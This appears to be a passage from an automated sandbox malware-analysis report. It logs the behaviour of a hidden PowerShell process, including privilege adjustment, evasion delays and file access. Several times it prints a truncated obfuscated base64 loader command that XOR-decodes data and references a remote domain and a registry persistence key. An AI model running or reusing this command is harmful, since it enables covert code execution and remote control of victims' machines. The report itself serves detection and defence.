cAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBl
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_003CACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_003CACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2336Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: powershell.exe, 00000003.00000002.888319048.0000000000629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgA